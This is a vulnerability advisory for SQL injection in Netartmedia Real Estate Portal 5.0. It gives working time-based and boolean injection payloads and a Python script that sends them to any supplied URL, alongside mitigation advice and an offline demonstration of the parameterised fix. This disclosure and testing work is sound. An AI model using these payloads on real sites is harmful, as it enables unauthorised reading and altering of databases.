Vendor: Real Estate Portal
By: Ahmet Ümit BAYRAM
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Real Estate Portal
Affected Version From: 5.0
Affected Version To: 5.0
Patch Exists: NO
Related CWE: N/A
CPE: a:netartmedia:real_estate_portal:5.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2019

Netartmedia Real Estate Portal 5.0 – Multiple SQL Injection

The Real Estate Portal is built to be multi-language: the main site can display several languages and lets visitors choose their preferred one. The vulnerability exists due to improper validation of user-supplied input in the 'user_email' parameter (forgotten-password form) and the 'page' parameter (multipart contact form) of the 'index.php' script, both of which reach SQL queries without adequate sanitisation. The published proofs of concept are a time-based blind injection via 'user_email' (a SLEEP() call that delays the response) and a boolean-based injection via 'page' (an appended OR tautology). A remote attacker, without an account since both forms are public, can send a specially crafted request with malicious SQL statements to the vulnerable script and execute arbitrary SQL commands in the application's database. This can allow the attacker to bypass authentication and to read, modify, or delete data within the database.

Mitigation:

Use parameterized (prepared) statements for every query that touches user-supplied data, so that the 'user_email' and 'page' values are bound as parameters rather than concatenated into the SQL string; this is the fix that removes the injection. Input validation (for example, rejecting anything that is not a syntactically valid e-mail address in 'user_email', or restricting 'page' to a known set of page keys) is worthwhile defence in depth but not a substitute. Stored procedures only help if they themselves avoid building dynamic SQL from their arguments. Additionally, the application should connect with a least-privileged database account, with no FILE, DROP or write privileges the front end does not need, which limits what a successful injection can do.

Exploit-DB raw data:

# Exploit Title: Netartmedia Real Estate Portal 5.0 - Multiple SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/realestate/
# Demo Site: https://www.phpscriptdemos.com/realestate/
# Version: 5.0
# Tested on: Kali Linux
# CVE: N/A
# Description: The real estate portal software is made to be
multi-language, the main site can show multiple languages and let the site
visitors choose their preferred language.

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/index.php
Parameter: user_email (POST)
Payload:
ProceedSend=1&mod=forgotten_password&user_email=0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z'
OR SLEEP(5)#

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/index.php
Parameter: MULTIPART page ((custom) POST)
Payload:
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="SubmitContact"

1
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="code"

94102
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="email"

sample@email.tst
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="message"

20
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="name"

${alpharand}
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="page"

en_Contact-2228' OR 3801=3801-- eISZ
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="phone"

555-666-0606
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="subject"

1
------WebKitFormBoundaryYUBPFrrBhV4S4pf0--
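As an added example that is not part of the Exploit-DB entry or of Netartmedia's code, the script below turns PoC 1 and PoC 2 above into repeatable checks and, through a constructed SQLite-backed stand-in for index.php, also shows the point of the Mitigation section: the same payloads stop working once the value is bound as a parameter instead of being interpolated into the SQL string. The field names, the boundary string and the 3801=3801 condition are taken from the PoCs; the `-- -` comment (in place of the MySQL-only `#`), the AND-based true/false pair for `page`, the fake target's table names, the response strings and the 0.8 timing margin are my assumptions.

```python
# Added example (not part of the Exploit-DB entry or of Netartmedia's code).
import re
import sqlite3
import time
import urllib.parse
import urllib.request

BOUNDARY = "----WebKitFormBoundaryYUBPFrrBhV4S4pf0"   # boundary reused from PoC 2


def forgotten_password_body(delay):
    """PoC 1 body. delay=0 is the baseline request; '-- -' closes the statement on
    MySQL and SQLite (the advisory's payload uses '#', which is MySQL-only)."""
    fields = {"ProceedSend": "1", "mod": "forgotten_password",
              "user_email": "0' OR SLEEP(%g)-- -" % delay}
    return urllib.parse.urlencode(fields).encode(), "application/x-www-form-urlencoded"


def contact_form_body(page):
    """PoC 2 body: the multipart contact form with an attacker-controlled 'page' field."""
    fields = [("SubmitContact", "1"), ("code", "94102"), ("email", "sample@email.tst"),
              ("message", "20"), ("name", "tester"), ("page", page),
              ("phone", "555-666-0606"), ("subject", "1")]
    body = "".join('--%s\r\nContent-Disposition: form-data; name="%s"\r\n\r\n%s\r\n'
                   % (BOUNDARY, name, value) for name, value in fields)
    return (body + "--%s--\r\n" % BOUNDARY).encode(), "multipart/form-data; boundary=" + BOUNDARY


def urllib_send(url, body, content_type):
    """Real transport: POST body to url, return (response bytes, elapsed seconds)."""
    req = urllib.request.Request(url, data=body, method="POST",
                                 headers={"Content-Type": content_type})
    start = time.monotonic()
    with urllib.request.urlopen(req, timeout=60) as resp:
        data = resp.read()
    return data, time.monotonic() - start


def check_time_based(url, send, delay=5.0):
    """PoC 1 check: the SLEEP(delay) request must be slower than the baseline by ~delay."""
    body, ctype = forgotten_password_body(0)
    baseline = send(url, body, ctype)[1]
    body, ctype = forgotten_password_body(delay)
    return send(url, body, ctype)[1] - baseline >= 0.8 * delay   # 0.8: jitter margin (assumed)


def check_boolean_based(url, send):
    """PoC 2 check: a true and a false appended condition must yield different responses.
    AND is used instead of the advisory's OR so the true case matches the normal page."""
    truthy, ctype = contact_form_body("en_Contact-2228' AND 3801=3801-- eISZ")
    falsy, _ = contact_form_body("en_Contact-2228' AND 3801=3802-- eISZ")
    return send(url, truthy, ctype)[0] != send(url, falsy, ctype)[0]


def run_checks(url, send=urllib_send, delay=5.0):
    return {"user_email (time-based)": check_time_based(url, send, delay),
            "page (boolean-based)": check_boolean_based(url, send)}


class FakeTarget:
    """Constructed SQLite-backed stand-in for index.php so the checks run offline.
    vulnerable=True interpolates the value into the SQL string (the bug on this page);
    vulnerable=False binds it as a parameter (the fix). Schema is an assumption."""

    def __init__(self, vulnerable):
        self.vulnerable = vulnerable
        self.db = sqlite3.connect(":memory:")
        self.db.create_function("SLEEP", 1, lambda s: time.sleep(s) or 0)  # emulate MySQL SLEEP()
        self.db.execute("CREATE TABLE users (email TEXT)")
        self.db.execute("INSERT INTO users VALUES ('admin@example.com')")
        self.db.execute("CREATE TABLE pages (page_key TEXT, body TEXT)")
        self.db.execute("INSERT INTO pages VALUES ('en_Contact-2228', 'Contact form')")

    def query(self, template, value):
        if self.vulnerable:
            return self.db.execute(template % ("'%s'" % value)).fetchall()
        return self.db.execute(template % "?", (value,)).fetchall()

    def __call__(self, url, body, content_type):
        start = time.monotonic()
        text = body.decode()
        if content_type.startswith("multipart/"):
            page = re.search(r'name="page"\r\n\r\n(.*?)\r\n', text).group(1)
            rows = self.query("SELECT body FROM pages WHERE page_key = %s", page)
            out = rows[0][0] if rows else "Page not found"
        else:
            email = urllib.parse.parse_qs(text)["user_email"][0]
            rows = self.query("SELECT email FROM users WHERE email = %s", email)
            out = "Password reset sent" if rows else "Unknown e-mail address"
        return out.encode(), time.monotonic() - start


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:   # e.g. http://localhost/[PATH]/index.php
        print(run_checks(sys.argv[1]))
    else:                   # offline demonstration against the constructed targets
        print("vulnerable:", run_checks("fake", FakeTarget(True), delay=0.5))
        print("patched:   ", run_checks("fake", FakeTarget(False), delay=0.5))
```

Run it with no arguments for the offline demonstration, or pass the URL of an install you are authorised to test (the `http://localhost/[PATH]/index.php` form used in the PoCs). Against the interpolating fake, the forgotten-password request with SLEEP() is delayed and the true/false contact-form pair returns different pages; against the parameterised fake, both payloads are just unmatched string values and neither check fires. The time-based check sends one baseline and one delayed request, so on a noisy network raise `delay` rather than loosen the margin.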